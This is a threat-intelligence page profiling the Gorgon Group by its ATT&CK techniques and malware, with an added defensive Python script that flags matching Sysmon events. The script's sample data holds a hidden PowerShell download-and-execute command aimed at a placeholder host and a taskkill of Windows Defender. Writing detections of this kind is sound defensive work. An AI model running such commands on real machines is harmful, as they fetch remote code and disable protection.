Where am I?
SECURITM is an SGRC system that automates the processes of information security departments. SECURITM helps build and manage ИСПДн (personal data information systems), КИИ (critical information infrastructure), ГИС (state information systems), СМИБ/СУИБ (ISMS) and banking security systems.
SECURITM is also a place where security teams exchange experience and working materials.

Gorgon Group

Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. (Citation: Unit 42 Gorgon Group Aug 2018)
ID: G0078
Associated Groups: 
Version: 1.5
Created: 17 Oct 2018
Last Modified: 12 Oct 2021

Techniques Used

Domain, ID, Name, Use

Enterprise T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence. (Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1547.009 Boot or Logon Autostart Execution: Shortcut Modification

Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence. (Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1059.001 Command and Scripting Interpreter: PowerShell

Gorgon Group malware can use PowerShell commands to download and execute a payload and to open a decoy document on the victim's machine. (Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1059.003 Command and Scripting Interpreter: Windows Command Shell

Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system. (Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1059.005 Command and Scripting Interpreter: Visual Basic

Gorgon Group has used macros in spearphishing attachments and has executed VBScripts on victim machines. (Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1564.003 Hide Artifacts: Hidden Window

Gorgon Group has used the -W Hidden switch, which sets the PowerShell WindowStyle parameter to Hidden, to conceal PowerShell windows. (Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1562.001 Impair Defenses: Disable or Modify Tools

Gorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender, using the taskkill command to terminate processes. (Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1588.002 Obtain Capabilities: Tool

Gorgon Group has obtained and used tools such as QuasarRAT and Remcos. (Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1566.001 Phishing: Spearphishing Attachment

Gorgon Group sent emails to victims with malicious Microsoft Office documents attached. (Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1055.002 Process Injection: Portable Executable Injection

Gorgon Group malware can download a remote access tool, ShiftyBug, and inject it into another process. (Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1055.012 Process Injection: Process Hollowing

Gorgon Group malware can use process hollowing to inject one of its trojans into another process. (Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1204.002 User Execution: Malicious File

Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails. (Citation: Unit 42 Gorgon Group Aug 2018)
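The telemetry a defender would look for, given the behaviours in the table above, as an added example that is not part of this page or of the Unit 42 report: a small Python triage routine run over constructed Sysmon-style events (Event ID 1 process creation, Event ID 13 registry value set). It maps each event to the technique IDs from the table: a PowerShell child of an Office application with a hidden window and a download cradle, a taskkill aimed at Windows Defender, and a Run key whose value points at a .lnk file. The event field names, the defensive process names and the cmd.exe download tools are assumptions, labelled in the code; the sample events are constructed here.

```python
"""Triage of Sysmon-style telemetry for the Gorgon Group behaviours above.

Added example for this page; it is not code from Unit 42, MITRE or the group.
Events mimic Sysmon Event ID 1 (process creation) and 13 (registry value set);
the sample events are constructed, not taken from a real incident, and the
process names marked "assumption" below are not from the Unit 42 report.
"""
import re

# Assumption: process names a Defender-targeting taskkill would name. MsMpEng.exe
# is the Windows Defender engine; the other two are illustrative.
DEFENSE_IMAGES = {"msmpeng.exe", "nissrv.exe", "msseces.exe"}
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# powershell.exe accepts any unambiguous prefix of -WindowStyle, so -w, -win and
# -WindowStyle all set the same parameter; match every prefix, longest first.
_WS_PREFIXES = "|".join("windowstyle"[:i] for i in range(len("windowstyle"), 0, -1))
HIDDEN_RE = re.compile(rf"(?<!\S)-(?:{_WS_PREFIXES})\s+hidden\b", re.I)
# Download cradles commonly seen in PowerShell one-liners.
PS_DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
# Assumption: how cmd.exe fetches a payload (the report only says that it does).
CMD_DOWNLOAD_RE = re.compile(r"certutil(?:\.exe)?\s.*-urlcache|bitsadmin(?:\.exe)?\s+/transfer|\bcurl(?:\.exe)?\s", re.I)
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
TASKKILL_IM_RE = re.compile(r'/im\s+"?([^\s"]+)', re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, surrounding quotes stripped."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(ev: dict) -> list[str]:
    """Return the ATT&CK technique IDs from the table above that one event matches."""
    hits = set()
    if ev["EventID"] == 1:  # process creation
        image = basename(ev["Image"])
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        if image in {"powershell.exe", "pwsh.exe"}:
            if HIDDEN_RE.search(cmd):
                hits.add("T1564.003")  # Hidden Window
            if PS_DOWNLOAD_RE.search(cmd):
                hits.add("T1059.001")  # PowerShell download-and-execute
        if image == "cmd.exe" and CMD_DOWNLOAD_RE.search(cmd):
            hits.add("T1059.003")  # Windows Command Shell fetching a payload
        if image == "taskkill.exe":
            targets = {t.lower() for t in TASKKILL_IM_RE.findall(cmd)}
            if targets & DEFENSE_IMAGES:
                hits.add("T1562.001")  # Disable or Modify Tools
        if parent in OFFICE_IMAGES and image in INTERPRETERS:
            # An Office application spawning an interpreter is the footprint of a
            # macro running from a malicious attachment the user opened.
            hits.update({"T1204.002", "T1059.005"})
    elif ev["EventID"] == 13:  # registry value set
        if RUN_KEY_RE.search(ev["TargetObject"]):
            hits.add("T1547.001")  # Registry Run Keys
            if basename(ev.get("Details", "")).endswith(".lnk"):
                hits.add("T1547.009")  # Run key pointing at a shortcut
    return sorted(hits)


def triage_events(events: list[dict]) -> dict[int, list[str]]:
    """Event index -> matched technique IDs, for the events that matched anything."""
    result = {}
    for i, ev in enumerate(events):
        hits = triage(ev)
        if hits:
            result[i] = hits
    return result


SAMPLE_EVENTS = [  # constructed for this example; paths, SID and URL are made up
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/s.ps1')\""},
    {"EventID": 1, "Image": r"C:\Windows\System32\taskkill.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "taskkill /F /IM MsMpEng.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\victim\AppData\Roaming\updater.lnk"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},  # benign: should match nothing
]

if __name__ == "__main__":
    for i, hits in triage_events(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[i]
        print(i, ev.get("CommandLine") or ev.get("TargetObject"), "->", ", ".join(hits))
```

The string checks only see what is in the command line: a PowerShell cradle passed through -EncodedCommand, or a WindowStyle given as its numeric enum value, would slip past them, so a production pipeline decodes the base64 argument before matching and pairs these rules with the process-injection and macro-execution signals the table also lists.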

Software

ID, Name, References, Techniques

S0332 Remcos
References: (Citation: Fortinet Remcos Feb 2017) (Citation: Riskiq Remcos Jan 2018) (Citation: Talos Remcos Aug 2018) (Citation: Unit 42 Gorgon Group Aug 2018)
Techniques: Registry Run Keys / Startup Folder, Clipboard Data, Process Injection, Python, Proxy, Modify Registry, Obfuscated Files or Information, System Checks, Windows Command Shell, Bypass User Account Control, Screen Capture, Ingress Tool Transfer, Keylogging, Video Capture, File and Directory Discovery, Audio Capture

S0336 NanoCore
References: (Citation: Cofense NanoCore Mar 2018) (Citation: DigiTrust NanoCore Jan 2017) (Citation: PaloAlto NanoCore Feb 2016) (Citation: Unit 42 Gorgon Group Aug 2018)
Techniques: Ingress Tool Transfer, Windows Command Shell, System Network Configuration Discovery, Video Capture, Disable or Modify System Firewall, Obfuscated Files or Information, Audio Capture, Visual Basic, Keylogging, Modify Registry, Symmetric Cryptography, Disable or Modify Tools, Registry Run Keys / Startup Folder, Uncommonly Used Port

S0385 njRAT
Also known as: Bladabindi, LV, Njw0rm
References: (Citation: Fidelis njRAT June 2013) (Citation: FireEye Njw0rm Aug 2013) (Citation: Trend Micro njRAT 2018) (Citation: Unit 42 Gorgon Group Aug 2018)
Techniques: System Information Discovery, Credentials from Web Browsers, Application Window Discovery, Ingress Tool Transfer, File and Directory Discovery, Query Registry, Peripheral Device Discovery, Video Capture, Screen Capture, Native API, Remote System Discovery, File Deletion, PowerShell, Disable or Modify System Firewall, Encrypted/Encoded File, Standard Encoding, Compile After Delivery, Non-Standard Port, Replication Through Removable Media, System Owner/User Discovery, Registry Run Keys / Startup Folder, Remote Desktop Protocol, Uncommonly Used Port, Custom Command and Control Protocol, Keylogging, Web Protocols, Clear Persistence, Modify Registry, Exfiltration Over C2 Channel, Process Discovery, Fast Flux DNS, Indicator Removal, Windows Command Shell, Data from Local System

S0262 QuasarRAT
Also known as: xRAT
References: (Citation: GitHub QuasarRAT) (Citation: Securelist APT10 March 2021) (Citation: TrendMicro Patchwork Dec 2017) (Citation: Unit 42 Gorgon Group Aug 2018) (Citation: Volexity Patchwork June 2018)
Techniques: Remote Desktop Protocol, Keylogging, Symmetric Cryptography, Credentials from Web Browsers, Registry Run Keys / Startup Folder, Hidden Window, System Information Discovery, Ingress Tool Transfer, System Location Discovery, Modify Registry, Hidden Files and Directories, System Owner/User Discovery, Bypass User Account Control, Data from Local System, Non-Application Layer Protocol, System Network Configuration Discovery, Credentials from Password Stores, Credentials In Files, Windows Command Shell, Proxy, Non-Standard Port, Code Signing, Scheduled Task, Video Capture
